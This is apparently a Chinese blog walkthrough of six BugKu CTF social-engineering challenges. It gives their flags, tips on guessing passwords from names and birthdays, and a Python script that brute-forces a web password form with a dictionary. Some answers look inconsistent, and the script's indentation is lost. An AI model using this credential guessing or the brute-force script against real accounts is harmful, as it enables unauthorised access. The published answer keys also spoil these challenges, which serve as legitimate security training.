带你上分,顺便拿下CTF|BugKu 社会工程学

1,226 阅读2分钟

BugKu社会工程学题型

这是我参与8月更文挑战的第9天,活动详情查看:8月更文挑战


1、密码

题干: 姓名:张三 生日;19970315 KEY格式KEY{xxxxxxxxxx}

解析: 直接首字母zs,生日,就行

答案: flag{zs199970315}

2、信息查找

题干: 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 格式KEY{xxxxxxxxxxx}

解析: 直接百度搜索 在这里插入图片描述 在这里插入图片描述 答案: KEY{462713425}

3、简单个人信息收集

参考链接
题干:
1.zip

解析:
首先尝试爆破,而后考虑ZIP伪加密,伪加密破解工具:
在这里插入图片描述
伪加密解决,打开后
在这里插入图片描述
社工的网站已经宕了

答案: flag{15206164164}

4、社工进阶

题干:
解析:百度贴吧搜索 孤长离
在这里插入图片描述
在这里插入图片描述
邮箱应该是弱口令登录,查找弱口令表,挨个试163邮箱的登录,a123456

答案: KEY{sg1H78Si9C0s99Q}

5、王小明的日记

参考链接

解析:
注意题干提示的信息:bugku在线工具
使用的工具为:在线密码攻击
使用在线密码攻击,生成字典:
在这里插入图片描述
得到字典
在这里插入图片描述
然后使用python脚本爆破

import requests,re
 
def req(pwd):
url='http://120.24.86.145:8002/xiaoming/?yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(r'密码不正确,请重新输入', response.text)
# print(b)
return b
 
def zidian():
f = open('mima.txt','r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
 
 
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] == '密码不正确,请重新输入':
# print(b[0])
pass
except:
print(pwd)
break
 

参考链接

python3.5 crack.py

wxm

密码wxm 在这里插入图片描述
在这里插入图片描述

答案:
flag{bugku-shegong_xmq}
参考链接1

6、简单的社工尝试

解析:
findneo.github.io/180406Bugku…
参考链接:
参考链接1
参考链接2
参考链接3
github.com/bugku
weibo.com/bugku
c.bugku.com/13211.txt

20200731195948960.png 答案: flag{BUku_open_shgcx1}